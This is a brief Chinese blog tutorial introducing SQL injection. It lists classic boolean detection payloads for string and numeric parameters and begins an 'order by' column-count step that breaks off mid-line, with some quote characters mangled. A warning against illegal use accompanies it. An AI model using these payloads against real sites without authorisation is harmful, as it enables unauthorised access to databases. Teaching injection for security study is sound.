SQL注入介绍

dingding 好物分享

前言
本篇文章介绍了sql注入的常见注入类型及方法! 注:切勿做违法乱纪之事,后果自行承担!!!!
正文
1 按变量类型
1.1 数字型
information_schema为MySQL自带数据库,所有数据库名、表名、字段名都可以从中查询到!
1)判断注入
.1’ and 1=‘1# 用and连接,若查询1结果正确,返回值为真
.1’ and 1=‘2# 用and连接,若查询1结果正确,返回值为假

#双引号注入
.1’’ and 1=’‘1# 用and连接,若查询1结果正确,返回值为真
.1’’ and 1=’'2# 用and连接,若查询1结果正确,返回值为假

#数字型注入
.1 and 1=1 用and连接,若查询1结果正确,返回值为真
.1 and 1=2 用and连接,若查询1结果正确,返回值为假

2)判断字段数 地址栏输入 ’ order by 数字
‘ order by

SQL注入介绍最先出现在Python成神之路

版权声明:
作者:dingding
链接:https://www.techfm.club/p/9954.html
来源:TechFM
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>